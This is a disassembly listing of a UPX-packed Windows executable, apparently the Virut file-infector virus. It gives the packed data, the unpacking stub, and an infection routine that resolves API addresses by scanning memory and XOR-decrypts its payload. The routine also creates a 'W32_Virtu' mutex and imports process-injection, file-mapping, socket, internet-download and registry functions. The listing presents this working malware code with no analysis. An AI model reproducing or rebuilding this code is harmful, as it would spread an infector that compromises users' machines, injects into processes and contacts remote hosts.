dd 7974690Ah, 6E614D20h, 58C5E91Eh, 31C91AB1h, 0C59DB48Ch
dd 5234D376h, 80E4153h, 0FFFFEFBCh, 0A4C11BFFh, 0DD499F8Eh
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 0EDFFFFFFh, 8C9AC3F2h, 0CC4D8556h, 0D3AD0FE1h, 37691506h
dd 98A8FD8Dh, 0CE700B16h, 1445504Fh, 0F837FFFFh, 0EF324A39h
dd 0D847AEE3h, 0BA84DFBDh, 7380371Eh, 0DF58B81h, 92E07D4Ah
dd 0E8DFFFFFh, 0B8C52DFEh, 85E020C6h, 5068BD9Ch, 50B6296Ah
dd 42C33482h, 9808117Fh, 0FFFFFFFFh, 0E7B7B21Ch, 77899D9Ch
dd 0D3971A3Dh, 8D5029A4h, 463A96A5h, 12E8FC8Dh, 0AF10EB16h
dd 0F8457044h, 0FFFFFFEAh, 78966AD0h
dd 51439FB1h, 86A827EBh, 98A3970h, 0A1C214DEh, 167A53C1h
dd 9785C4BFh, 0A0DFA378h, 9829E70Fh, 53899E9Eh, 940724FEh
dd 0FFFFFFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0F02FFFFFh
dd 0EB67E042h, 60B737B2h, 0D7D8B3AAh, 65048022h, 0FF4BA67Ah
dd 45855886h, 0FC1BFFA6h, 0EEF96EF6h, 3290C956h, 0B7A63B4Ah
dd 0EBD3D87Ah, 97EE4263h, 0F7041888h, 31505FE8h, 0A69A03CCh
dd 98B49A69h, 2C3C5878h, 69B2CD34h, 0DC5EF814h, 34D3B4CCh
dd 90A4D34Dh, 0B607480h, 7142E96Dh, 5B6D2E9Fh, 6CDC0575h
dd 0A7685B24h, 0B700492Eh, 96B60D64h, 6BC52C2Dh, 611C67ADh
dd 0DB01F06Eh, 2C7586D8h, 7A6F2F72h, 70DB7962h, 41D9ACBCh
dd 0A4147262h, 0AD600C79h, 58796C25h, 0D6674A38h, 0CA6B46F1h
dd 732E61B6h, 84277578h, 6EC73A36h, 3D2E1646h, 6D80B067h
dd 2FCA468Eh, 51C6C28h, 6734BB7Bh, 116F701Ah, 13617A2Eh
dd 0CF1B66C3h, 61FE3309h, 401A5F13h, 676F8E6Eh, 776B7543h
dd 675DBD90h, 1F74D85Eh, 1FA56364h, 0FCA9EB59h, 2D736F6Ch
dd 0A72E5861h, 6BADB220h, 0AB75E35Bh, 0BE62166Ch, 0B6BB253Dh
dd 7266B92Fh, 4A616C66h, 0EEC09FEh, 61726733h, 74612E7Ah
dd 6D0B8180h, 7736876Dh, 7DBBDA2Dh, 1EE5AE6Ah, 6362CB75h
dd 0BF676621h, 7FDB0BEAh, 6D6C6B6Ah, 71706F6Eh, 77927452h
dd 0DA7A7978h, 0F95FFE58h, 44434241h, 48474645h, 4E4B4A49h
dd 7B5751FCh, 544058A1h, 5A59581Ah, 0F5ADB81Bh, 77A08152h
dd 0B62A2038h, 2140E907h, 0FF8C6702h, 0F60C4BCBh, 4B43CA56h
dd 26501320h, 0F66E9553h, 4E4F0B64h, 490B0A47h, 0FA5DAC3Fh
dd 92353407h, 2F0C4F4Ah, 54495551h, 24816B6Fh, 477B561Ah
dd 0B6E5F766h, 74231163h, 841779B5h, 0C0E0075Fh, 20A202CBh
dd 0BED6F328h, 6203E85Dh, 34203B64h, 36204549h, 0B060915h
dd 0B41EAC30h, 70164035h, 29EC5Fh, 371776Bh, 0CEBA2C61h
dd 4D02E6B5h, 690F075Ch, 8127C03h, 2D6569B7h, 0A6C71331h
dd 0C48A08BBh, 0FFEE4009h, 6C01FF97h, 63727473h, 4741706Dh
dd 6F4C7465h, 656C6163h, 6F666E49h, 56715B0Fh, 44525394h
dd 452E6309h, 797F14B7h, 65595715h, 588A4746h, 9E303483h
dd 0BD9A6954h, 0E6DB997h, 206F540Bh, 0ED65A015h, 4146000Ch
dd 3C42BF0Ch, 4D3F0DF6h, 2DAC646Fh, 0B016614Eh, 8E412D93h
dd 7E5E4169h, 6F40AEFh, 4309DF1Fh, 1E79706Fh, 387BFEE4h
dd 456E6993h, 81516578h, 0ED06FFF6h, 9A6C6F7Eh, 53323370h
dd 7370616Eh, 19746F68h, 0A0CDADDDh, 723212D3h, 5540F73h
dd 0C641AD73h, 0F6182C35h, 2180FB06h, 7478654Eh, 54727068h
dd 7867CB6Ch, 0FF087645h, 538B4661h, 42B7B9B1h, 624F7BE4h
dd 4414996Ah, 0A136796h, 4CB715CFh, 0CAC94561h, 263A15ADh
dd 6378452Fh, 7B61DBB2h, 5C6E2354h, 65706506h, 5F092C97h
dd 2E6E4711h, 0D8A06F12h, 64410B3Fh, 140F7264h, 7262694Ch
dd 84B60C28h, 4D2B8961h, 8DC4625h, 5FAB1F67h, 100E4865h
dd 9F874496h, 0C2E16CCBh, 701D166Ch, 476B63A2h, 6D61D12Dh
dd 4DE57275h, 366C78DFh, 0C4F39289h, 45986A0Dh, 0E193198h
dd 7B0E8162h, 31E91943h, 0DB639249h, 6BE48376h, 630A6465h
dd 522D6D13h, 70C9785Dh, 45083A1Bh, 0C426657Ah, 3D5E8613h
dd 5868D100h, 15EECDA1h, 1A747079h, 710C4B2h, 0A2FB6CDh
dd 0E611244h, 0C3057BECh, 79666976h, 3CCA6746h, 0B7B016D5h
dd 578F10A1h, 112C796Fh, 0BEC1866Dh, 1079654Bh, 651EB252h
dd 178763F9h, 4114EF3Eh, 69757163h, 871A1672h, 8F494D0Dh
dd 0B9B6745Ch, 0C13AF759h, 0EF0D9267h, 3B0E1041h, 3E0D2194h
dd 90EC510Fh, 350AD6B0h, 98302511h, 2D0466C5h, 0E19E1021h
dd 5FB5458Eh, 0F5696241h, 0C34D6853h, 0AF8B1446h, 0F8DE136Eh
dd 3B77E5DDh, 5696F78h, 69736E61h, 0B6EF6304h, 736FCBF6h
dd 5F48455Fh, 6744DC70h, 78435F0Bh, 98263878h, 0E74C6C4Ah
dd 83936B81h, 768627Dh, 2A427970h, 9A15BB3Bh, 5FDDCFE2h
dd 29332868h, 1CD7399Bh, 11727473h, 5B49060Dh, 6D6C31CCh
dd 0AC0FBA36h, 0D9B6B774h, 3CE9946Ch, 7C737701h, 1966748Bh
dd 5219A682h, 5639651Bh, 3AA29168h, 0BD8146Fh, 1B366331h
dd 0C7290B21h, 5383B669h, 0F44F6449h, 0F6D83B50h, 35A78AE0h
dd 11417355h, 5B01196Ch, 1B114E0Eh, 5D3706A6h, 77936EBBh
dd 0C5D55753h, 525574A2h, 0B2CBA564h, 2125B2Ch, 0D027308h
dd 0B2CB2C01h, 0B6F392Ch, 2CB21734h, 90CB2CBh, 54101304h
dd 16CA00CFh, 46455057h, 2FA025F5h, 0D3275DB7h, 9ACF0340h
dd 0F001FEDh, 6010B01h, 1312340Ch, 98D81D18h, 30E5017Bh
dd 0DD0B3135h, 2C0092Ch, 700C076Bh, 25B99D81h, 710341Eh
dd 0B258E58Ah, 3B680306h, 176C28Ch, 0B0647FC2h, 53581E01h
dd 42EBA75h, 0C1903303h, 34360608h, 0C837C0C4h, 0E004F4EDh
dd 0FB90642Eh, 271211CDh, 48586E0Ah, 0C03838h, 61800060h
dd 33D205Bh, 1962Ch, 0
dd 0FF2000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset aMoscowAdvokat_ ; "moscow-advokat.ru"
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31508422
; ---------------------------------------------------------------------------
align 8
loc_31508418: ; CODE XREF: UPX1:loc_31508429�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_3150841E: ; CODE XREF: UPX1:315084B6�j
; UPX1:315084CD�j
add ebx, ebx
jnz short loc_31508429
loc_31508422: ; CODE XREF: UPX1:31508410�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508429: ; CODE XREF: UPX1:31508420�j
jb short loc_31508418
mov eax, 1
loc_31508430: ; CODE XREF: UPX1:3150843F�j
; UPX1:3150844A�j
add ebx, ebx
jnz short loc_3150843B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150843B: ; CODE XREF: UPX1:31508432�j
adc eax, eax
add ebx, ebx
jnb short loc_31508430
jnz short loc_3150844C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31508430
loc_3150844C: ; CODE XREF: UPX1:31508441�j
xor ecx, ecx
sub eax, 3
jb short loc_31508460
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_315084D2
mov ebp, eax
loc_31508460: ; CODE XREF: UPX1:31508451�j
add ebx, ebx
jnz short loc_3150846B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_3150846B: ; CODE XREF: UPX1:31508462�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31508478
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508478: ; CODE XREF: UPX1:3150846F�j
adc ecx, ecx
jnz short loc_3150849C
inc ecx
loc_3150847D: ; CODE XREF: UPX1:3150848C�j
; UPX1:31508497�j
add ebx, ebx
jnz short loc_31508488
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31508488: ; CODE XREF: UPX1:3150847F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_3150847D
jnz short loc_31508499
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_3150847D
loc_31508499: ; CODE XREF: UPX1:3150848E�j
add ecx, 2
loc_3150849C: ; CODE XREF: UPX1:3150847A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_315084BC
loc_315084AD: ; CODE XREF: UPX1:315084B4�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_315084AD
jmp loc_3150841E
; ---------------------------------------------------------------------------
align 4
loc_315084BC: ; CODE XREF: UPX1:315084AB�j
; UPX1:315084C9�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_315084BC
add edi, ecx
jmp loc_3150841E
; ---------------------------------------------------------------------------
loc_315084D2: ; CODE XREF: UPX1:3150845C�j
pop esi
mov edi, esi
mov ecx, 0CAh
loc_315084DA: ; CODE XREF: UPX1:315084E1�j
; UPX1:315084E6�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_315084DF: ; CODE XREF: UPX1:31508504�j
cmp al, 1
ja short loc_315084DA
cmp byte ptr [edi], 1
jnz short loc_315084DA
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_315084DF
lea edi, [esi+6000h]
loc_3150850C: ; CODE XREF: UPX1:3150852E�j
mov eax, [edi]
or eax, eax
jz short loc_31508557
mov ebx, [edi+4]
lea eax, [eax+esi+8000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+808Ch]
xchg eax, ebp
loc_31508529: ; CODE XREF: UPX1:3150854F�j
mov al, [edi]
inc edi
or al, al
jz short loc_3150850C
mov ecx, edi
jns short near ptr loc_3150853A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_3150853A: ; CODE XREF: UPX1:31508532�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+8090h]
or eax, eax
jz short loc_31508551
mov [ebx], eax
add ebx, 4
jmp short loc_31508529
; ---------------------------------------------------------------------------
loc_31508551: ; CODE XREF: UPX1:31508548�j
call dword ptr [esi+8094h]
loc_31508557: ; CODE XREF: UPX1:31508510�j
popa
jmp loc_31501D18
; ---------------------------------------------------------------------------
align 1000h
UPX1 ends
; Section 3. (virtual address 00009000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00009000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31509000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 90C4h, 908Ch, 3 dup(0)
dd 90D1h, 909Ch, 3 dup(0)
dd 90DEh, 90A4h, 3 dup(0)
dd 90E9h, 90ACh, 3 dup(0)
dd 90F4h, 90B4h, 3 dup(0)
dd 9100h, 90BCh, 5 dup(0)
dword_3150908C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C4D444h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h
dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 0A16764FAh
dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
dd 12345678h, 60000387h, 84000000h, 0
; ---------------------------------------------------------------------------
push eax
xor [eax], eax
add es:[eax], al
push eax
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
call sub_31509291
call sub_315092FF
jmp loc_315092BD
start endp
; =============== S U B R O U T I N E =======================================
sub_31509291 proc near ; CODE XREF: start+3�p
push dword ptr fs:0
mov fs:0, esp
xor eax, eax
push eax
push 200h
push eax
push 80000000h
push 8
push eax
push 80000000h
push eax
call ds:dword_3150908C ; LoadLibraryA
loc_315092BD: ; CODE XREF: start+D�j
sub esi, esi
sub ecx, ecx
mov cl, 88h
loc_315092C3: ; CODE XREF: sub_31509291+33�j
inc esi
loop loc_315092C3
call sub_315092FB
sub edx, 0FFFFFFBFh
push edx
xor ecx, ecx
xor ecx, 243Ch
loc_315092DA: ; CODE XREF: sub_31509291+57�j
mov al, [edx]
sub ax, si
mov [edx], al
inc edx
inc esi
sub ecx, 1
or ecx, ecx
jnz short loc_315092DA
pop edx
mov esp, fs:0
pop dword ptr fs:0
pop esi
pop ebp
jmp edx
sub_31509291 endp
; =============== S U B R O U T I N E =======================================
sub_315092FB proc near ; CODE XREF: sub_31509291+35�p
pop edx
push edx
retn
sub_315092FB endp
; ---------------------------------------------------------------------------
db 90h
; =============== S U B R O U T I N E =======================================
sub_315092FF proc near ; CODE XREF: start+8�p
arg_C = dword ptr 10h
mov eax, [esp+arg_C]
pop dword ptr [eax+0B8h]
xor eax, eax
retn
sub_315092FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_31509358
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3150934F
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_31509357
; ---------------------------------------------------------------------------
loc_3150934F: ; CODE XREF: UPX2:31509340�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_31509357: ; CODE XREF: UPX2:3150934D�j
pop ebx
loc_31509358: ; CODE XREF: UPX2:31509329�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 112h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_3150937F: ; CODE XREF: UPX2:3150939B�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_31509395
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_3150939D
loc_31509395: ; CODE XREF: UPX2:31509386�j
sub ebx, 100h
jnz short loc_3150937F
loc_3150939D: ; CODE XREF: UPX2:31509393�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_315093AB: ; CODE XREF: UPX2:loc_315093D2�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_315093D2
cmp dword ptr [eax+3], 636F7250h
jnz short loc_315093D2
cmp dword ptr [eax+7], 72646441h
jnz short loc_315093D2
cmp dword ptr [eax+0Bh], 737365h
jz short loc_315093D7
loc_315093D2: ; CODE XREF: UPX2:315093B5�j
; UPX2:315093BE�j ...
loop loc_315093AB
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_315093D7: ; CODE XREF: UPX2:315093D0�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_315093FD+2
inc ebx
insb
outsd
jnb short near ptr loc_3150945B+2
dec eax
popa
outsb
db 64h
insb
loc_315093FD: ; CODE XREF: UPX2:315093EE�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_31509419+1
inc ebx
jb short near ptr loc_31509474+1
popa
jz short near ptr loc_31509474+4
inc ebp
jbe short near ptr loc_3150947A+1
outsb
jz short near ptr loc_31509458+2
loc_31509419: ; CODE XREF: UPX2:31509408�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_31509435
inc edi
db 65h
jz short near ptr loc_31509474+4
popa
jnb short loc_315094A3
inc ebp
jb short near ptr loc_315094A3+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31509435 proc near ; CODE XREF: UPX2:31509423�p
; FUNCTION CHUNK AT 315094DE SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 3150961E SIZE 0000013A BYTES
push ebx
call esi ; rand
mov [ebp+403544h], eax
call sub_315094B3
test eax, eax
jz short loc_31509468
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31509462
lea eax, [ebp+4011D2h]
loc_31509458: ; CODE XREF: UPX2:31509417�j
mov dl, [eax-1]
loc_3150945B: ; CODE XREF: UPX2:315093F6�j
call sub_315094CE
jmp short loc_315094DE
; ---------------------------------------------------------------------------
loc_31509462: ; CODE XREF: sub_31509435+1B�j
; sub_31509435+136�j ...
call dword ptr [ebp+40353Ch]
loc_31509468: ; CODE XREF: sub_31509435+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31509492
loc_31509474: ; CODE XREF: UPX2:3150940E�j
; UPX2:31509411�j ...
lea esi, [ebp+403435h]
loc_3150947A: ; CODE XREF: UPX2:31509414�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_31509492: ; CODE XREF: sub_31509435+3D�j
pop ebp
retn
sub_31509435 endp
; ---------------------------------------------------------------------------
loc_31509494: ; CODE XREF: sub_315094B3+2�p
; sub_31509435:loc_3150969D�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_315094A3: ; CODE XREF: UPX2:3150942D�j
; UPX2:31509430�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_315094B3 proc near ; CODE XREF: sub_31509435+9�p
; UPX2:loc_3150A158�p
xor ecx, ecx
call loc_31509494
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_315094B3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_315094CE proc near ; CODE XREF: sub_31509435:loc_3150945B�p
; sub_3150B2A2+25B�p
mov dh, dl
mov ecx, 225Fh
loc_315094D5: ; CODE XREF: sub_315094CE+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_315094D5
retn
sub_315094CE endp
; ---------------------------------------------------------------------------
db 73h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31509435
loc_315094DE: ; CODE XREF: sub_31509435+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_31509505: ; CODE XREF: sub_31509435+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_31509505
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_31509898
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_3150961E
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31509462
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31509435
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31509462
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31509462
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_3150960E
jmp loc_31509462
; =============== S U B R O U T I N E =======================================
sub_3150960E proc near ; CODE XREF: UPX2:31509604�p
; sub_3150960E+D�j
push 1
pop ecx
jecxz short locret_3150961D
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_3150960E
; ---------------------------------------------------------------------------
locret_3150961D: ; CODE XREF: sub_3150960E+3�j
retn
sub_3150960E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31509435
loc_3150961E: ; CODE XREF: sub_31509435+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31509462
call near ptr loc_31509635+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31509635: ; CODE XREF: sub_31509435+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31509652+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_31509898
loc_31509652: ; CODE XREF: sub_31509435+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31509462
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_3150969D
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_3150969D: ; CODE XREF: sub_31509435+25D�j
call loc_31509494
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_315096E2: ; CODE XREF: sub_31509435+2B0�j
lodsb
stosw
loop loc_315096E2
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31509462
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31509435
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h, 0E0h, 18h
db 40h ; @
align 2
dw 0FF52h
db 95h ;
db 9Ch, 35h, 40h
db 0
db 0E8h, 16h, 0
db 0
align 2
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dd 4895FF50h, 89004035h, 40354C85h, 6A545000h, 0FFFF6A20h
dd 4035EC95h, 5FC08500h, 6A963F75h, 8B565602h, 52016AD4h
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0FF560065h
dd 40354C95h, 56C48B00h, 56505656h, 0D095FF57h, 83004035h
dd 0FF5710C4h, 40353C95h, 6A006A00h, 7095FF02h, 0B9004035h
dd 128h, 89E12B97h, 5754240Ch, 35AC95FFh, 0F6330040h, 363CA583h
dd 54000040h, 0B095FF57h, 85004035h, 465C74C0h, 7204FE83h
dd 2474FFEEh, 6A006A08h, 0A895FF2Ah, 85004035h, 93DC74C0h
dd 43DE8h, 91C93300h, 853930E3h, 40363Ch, 0C1812875h, 0DAEh
dd 56505450h, 53505051h, 356895FFh, 0C0850040h, 0FF0F7459h
dd 8F082474h, 40363C85h, 0FDACE800h, 0FF53FFFFh, 40353C95h
dd 8198EB00h, 128C4h, 95FF5700h, 40353Ch, 0FFFBE5E9h, 498DFFh
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_31509898 proc near ; CODE XREF: sub_31509435+100�p
; sub_31509435+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_315098A3: ; CODE XREF: sub_31509898+E�j
lodsb
test al, al
jnz short loc_315098A3
loop sub_31509898
retn
sub_31509898 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
